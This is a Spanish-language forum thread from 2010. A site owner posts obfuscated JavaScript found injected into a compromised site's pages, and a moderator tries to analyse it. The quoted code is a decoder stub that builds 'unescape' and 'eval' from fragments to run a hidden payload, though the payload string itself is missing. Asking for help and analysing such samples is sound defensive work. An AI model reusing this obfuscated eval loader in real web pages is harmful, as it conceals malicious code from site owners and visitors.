elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  virus en archivo html? / y algunos php
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: virus en archivo html? / y algunos php  (Leído 12,251 veces)
Cergath


Desconectado Desconectado

Mensajes: 340



Ver Perfil
virus en archivo html? / y algunos php
« en: 11 Noviembre 2010, 21:40 pm »

Hola... parece que hackearon un sitio que tenia, nada importante pero me preocupa, es de un VPS asi que tengo todos los permisos, tiene cpanel instalado...

en mis archivos index o home aparecieron de la nada estos codigos js:
Citar
<script language="javascript">
var kasbd3412 = "";
$$ = function () { try{kasbd3412= $$dfsd(gnflseejrr()); kasbd3412.do(); } catch(e){ var bn = ""; return kasbd3412;}};
var adlan3r$oubw = "e";$$dfsd =  this['a'+'s'+'d'];var adlan3r$ouaw = "a";
function asd(df_){this['r']="";
var s = df_;
for(__fh=0;this['__fh']<s['l'+adlan3r$oubw+'ng'+'t'+'h'];__fh++ ){i=__fh;if(s['ch'+adlan3r$ouaw +'rA'+'t'](i)=='Z'){this[neAR_DEF_FGEvftDSyTtnSoh_1]='%'} else {this[neAR_DEF_FGEvftDSyTtnSoh_1]=s['ch'+'ar'+'At'](this['i'])}this['r']=r+VAR_EZJrWcTGuhPYZJj(this,neAR_DEF_FGEvftDSyTtnSoh_1)}
return this['unesc'+adlan3r$ouaw + 'p'+adlan3r$oubw](r)}
var ez=window
VAR_AiCzwbiiMdphDXs=(function(VAR_JMFILTCeLQNWkAf,VAR_gqWQtFFAsjjtVqK){return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];
});
VAR_EZJrWcTGuhPYZJj=(function(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF){return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF);
});
function gnflseejrr() {return $a}var neAR_DEF_FGEvftDSyTtnSoh_1='s'+'1'; BKbk34b32=

Mas abajo luego de mas codigo.
Citar
var $a = BKbk34b32.replace(/98/g, "Z");
ez[String.fromCharCode(101,118,97)+'l']($$())
</script>
<script language="javascript">
var kasbd3412 = "";
$$ = function () { try{kasbd3412= $$dfsd(gnflseejrr()); kasbd3412.do(); } catch(e){ var bn = ""; return kasbd3412;}};
var adlan3r$oubw = "e";$$dfsd =  this['a'+'s'+'d'];var adlan3r$ouaw = "a";
function asd(df_){this['r']="";
var s = df_;
for(__fh=0;this['__fh']<s['l'+adlan3r$oubw+'ng'+'t'+'h'];__fh++ ){i=__fh;if(s['ch'+adlan3r$ouaw +'rA'+'t'](i)=='Z'){this[neAR_DEF_FGEvftDSyTtnSoh_1]='%'} else {this[neAR_DEF_FGEvftDSyTtnSoh_1]=s['ch'+'ar'+'At'](this['i'])}this['r']=r+VAR_EZJrWcTGuhPYZJj(this,neAR_DEF_FGEvftDSyTtnSoh_1)}
return this['unesc'+adlan3r$ouaw + 'p'+adlan3r$oubw](r)}
var ez=window
VAR_AiCzwbiiMdphDXs=(function(VAR_JMFILTCeLQNWkAf,VAR_gqWQtFFAsjjtVqK){return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];
});
VAR_EZJrWcTGuhPYZJj=(function(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF){return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF);
});
function gnflseejrr() {return $a}var neAR_DEF_FGEvftDSyTtnSoh_1='s'+'1'; BKbk34b32=

Sigue mas y mas codigo hasta que acaba:
Citar
var $a = BKbk34b32.replace(/98/g, "Z");
ez[String.fromCharCode(101,118,97)+'l']($$())
</script>

Que podra ser?
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: virus en archivo html? / y algunos php
« Respuesta #1 en: 11 Noviembre 2010, 22:07 pm »

Finalmente, el código queda así, dejame debugearlo y miro a ver que hace.
Código
  1. <script language="javascript">
  2.    var kasbd3412 = "";
  3.    $$ = function() {
  4.        try {
  5.            kasbd3412 = $$dfsd(gnflseejrr());
  6.            kasbd3412.do();
  7.        } catch (e) {
  8.            var bn = "";
  9.            return kasbd3412;
  10.        }
  11.    };
  12.    var adlan3r$oubw = "e";
  13.    $$dfsd = this['a' + 's' + 'd'];
  14.    var adlan3r$ouaw = "a";
  15.  
  16.    function asd(df_) {
  17.        this['r'] = "";
  18.        var s = df_;
  19.        for (__fh = 0; this['__fh'] < s['l' + adlan3r$oubw + 'ng' + 't' + 'h']; __fh++) {
  20.            i = __fh;
  21.            if (s['ch' + adlan3r$ouaw + 'rA' + 't'](i) == 'Z') {
  22.                this[neAR_DEF_FGEvftDSyTtnSoh_1] = '%'
  23.            } else {
  24.                this[neAR_DEF_FGEvftDSyTtnSoh_1] = s['ch' + 'ar' + 'At'](this['i'])
  25.            }
  26.            this['r'] = r + VAR_EZJrWcTGuhPYZJj(this, neAR_DEF_FGEvftDSyTtnSoh_1)
  27.        }
  28.        return this['unesc' + adlan3r$ouaw + 'p' + adlan3r$oubw](r)
  29.    }
  30.    var ez = window
  31.    VAR_AiCzwbiiMdphDXs = (function(VAR_JMFILTCeLQNWkAf, VAR_gqWQtFFAsjjtVqK) {
  32.        return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];
  33.    });
  34.    VAR_EZJrWcTGuhPYZJj = (function(VAR_wiSIHKenjOMRPsE, VAR_SfXtSSNCWJXwgQF) {
  35.        return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE, VAR_SfXtSSNCWJXwgQF);
  36.    });
  37.  
  38.    function gnflseejrr() {
  39.        return $a
  40.    }
  41.    var neAR_DEF_FGEvftDSyTtnSoh_1 = 's' + '1';
  42.    BKbk34b32 =
  43.    var $a = BKbk34b32.replace(/98/g, "Z");
  44.    ez[String.fromCharCode(101, 118, 97) + 'l']($$())
  45. </script>
  46. <script language="javascript">
  47.    var kasbd3412 = "";
  48.    $$ = function() {
  49.        try {
  50.            kasbd3412 = $$dfsd(gnflseejrr());
  51.            kasbd3412.do();
  52.        } catch (e) {
  53.            var bn = "";
  54.            return kasbd3412;
  55.        }
  56.    };
  57.    var adlan3r$oubw = "e";
  58.    $$dfsd = this['a' + 's' + 'd'];
  59.    var adlan3r$ouaw = "a";
  60.  
  61.    function asd(df_) {
  62.        this['r'] = "";
  63.        var s = df_;
  64.        for (__fh = 0; this['__fh'] < s['l' + adlan3r$oubw + 'ng' + 't' + 'h']; __fh++) {
  65.            i = __fh;
  66.            if (s['ch' + adlan3r$ouaw + 'rA' + 't'](i) == 'Z') {
  67.                this[neAR_DEF_FGEvftDSyTtnSoh_1] = '%'
  68.            } else {
  69.                this[neAR_DEF_FGEvftDSyTtnSoh_1] = s['ch' + 'ar' + 'At'](this['i'])
  70.            }
  71.            this['r'] = r + VAR_EZJrWcTGuhPYZJj(this, neAR_DEF_FGEvftDSyTtnSoh_1)
  72.        }
  73.        return this['unesc' + adlan3r$ouaw + 'p' + adlan3r$oubw](r)
  74.    }
  75.    var ez = window
  76.    VAR_AiCzwbiiMdphDXs = (function(VAR_JMFILTCeLQNWkAf, VAR_gqWQtFFAsjjtVqK) {
  77.        return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];
  78.    });
  79.    VAR_EZJrWcTGuhPYZJj = (function(VAR_wiSIHKenjOMRPsE, VAR_SfXtSSNCWJXwgQF) {
  80.        return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE, VAR_SfXtSSNCWJXwgQF);
  81.    });
  82.  
  83.    function gnflseejrr() {
  84.        return $a
  85.    }
  86.    var neAR_DEF_FGEvftDSyTtnSoh_1 = 's' + '1';
  87.    BKbk34b32 =
  88.    var $a = BKbk34b32.replace(/98/g, "Z");
  89.    ez[String.fromCharCode(101, 118, 97) + 'l']($$())
  90. </script>
En línea

Te vendería mi talento por poder dormir tranquilo.
Cergath


Desconectado Desconectado

Mensajes: 340



Ver Perfil
Re: virus en archivo html? / y algunos php
« Respuesta #2 en: 12 Noviembre 2010, 02:23 am »

Uyy que bueno, por fav or informame de los resultados que obtienes :/ and o algo preo cupad o
En línea

Cergath


Desconectado Desconectado

Mensajes: 340



Ver Perfil
Re: virus en archivo html? / y algunos php
« Respuesta #3 en: 12 Noviembre 2010, 22:45 pm »

tenes a lgo? es que m´e preocup´a bastante y no se si sea alarmante
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: virus en archivo html? / y algunos php
« Respuesta #4 en: 13 Noviembre 2010, 04:07 am »

Bueno, mirándolo, solo pude decodificar algunas variables. Pero aún falta, solo que esta el código donde esta definido las variables y funciones, pero no esta el código donde se invoca estás. Esto es importa ya que vemos los parámetros que son pasados a las funciones.

Intenta buscar más código.
En línea

Te vendería mi talento por poder dormir tranquilo.
Cergath


Desconectado Desconectado

Mensajes: 340



Ver Perfil
Re: virus en archivo html? / y algunos php
« Respuesta #5 en: 13 Noviembre 2010, 16:35 pm »

t agrade zco mucho tu tiem´po, de veras ;-) tiene´s idea de como pudo infectarse? o que carajos puede hacer ese codigo?...

pd. no ocnozco mas de ese codigo, por ahora es l o unico que tengo, permite me buscar mas ;)
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: virus en archivo html? / y algunos php
« Respuesta #6 en: 13 Noviembre 2010, 16:39 pm »

Pues, cuando estuve trabajando en una empresa XXX -que por cierto, son unos *****, cabrones, hijos de p**a- cof, cof... Se les entro un virus así a todas las paginas que tenían alojadas en el servidor. Pero lo que hacia era SPAM. En este no se que es lo que hace. XD, tendría que ver los parámetros enviados.
En línea

Te vendería mi talento por poder dormir tranquilo.
Cergath


Desconectado Desconectado

Mensajes: 340



Ver Perfil
Re: virus en archivo html? / y algunos php
« Respuesta #7 en: 13 Noviembre 2010, 20:57 pm »

m mm puede ser que el pc tenga spyware y la maquina infectada que se conecta al pc haya infectado los archivos? porque por el vps, estoy ciertamente seguro de que no esta infectado, lo dudo muuuuucho...
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: virus en archivo html? / y algunos php
« Respuesta #8 en: 13 Noviembre 2010, 21:25 pm »

Sería bastante bueno, que pusieras todo el código de algún archivo infectado. A ver si se logra mirar los parámetros.
En línea

Te vendería mi talento por poder dormir tranquilo.
Cergath


Desconectado Desconectado

Mensajes: 340



Ver Perfil
Re: virus en archivo html? / y algunos php
« Respuesta #9 en: 14 Noviembre 2010, 16:10 pm »

hla d nuevo, perdona digitar asi pero dsde un cel es complikdo, en fin...

primero que todo de verdad te agradezco mas que todo tu tiempo, en verdad,muchisimas gracias....

esta es una recopilacion de algunos archivos infectados  que hi ce antes de eliminarlos, m i primera reac cion fue limpiar,luego deje unos pocos..
http://www.megaupload.com/?d=8CJHD9RM

algunos contienen es un codigo n php...

y bueno, aunque no descubramos bien que es, sabes de q se trata? q tipo de vulnerabilidad o malware puede ser? generalmente q hace y como puedo prvenirlo?


gracias
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Vinculo archivo en html
Desarrollo Web
eduardogi 3 2,694 Último mensaje 24 Mayo 2011, 14:49 pm
por #!drvy
Rastrear archivo de html
Hacking
Cassual 1 2,559 Último mensaje 19 Diciembre 2011, 22:23 pm
por Pablo Videla
Extraño archivo xml con información de algunos de nosotros.
Foro Libre
NikNitro! 3 1,934 Último mensaje 6 Febrero 2015, 23:57 pm
por NikNitro!
Marca con [VIRUS] algunos correos
Seguridad
tomigg 2 2,524 Último mensaje 15 Enero 2020, 16:52 pm
por tomigg
Virus broma en Aplicacion Html (.hta)
Análisis y Diseño de Malware
destructor000 1 421 Último mensaje 30 Agosto 2024, 18:51 pm
por MCKSys Argentina
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines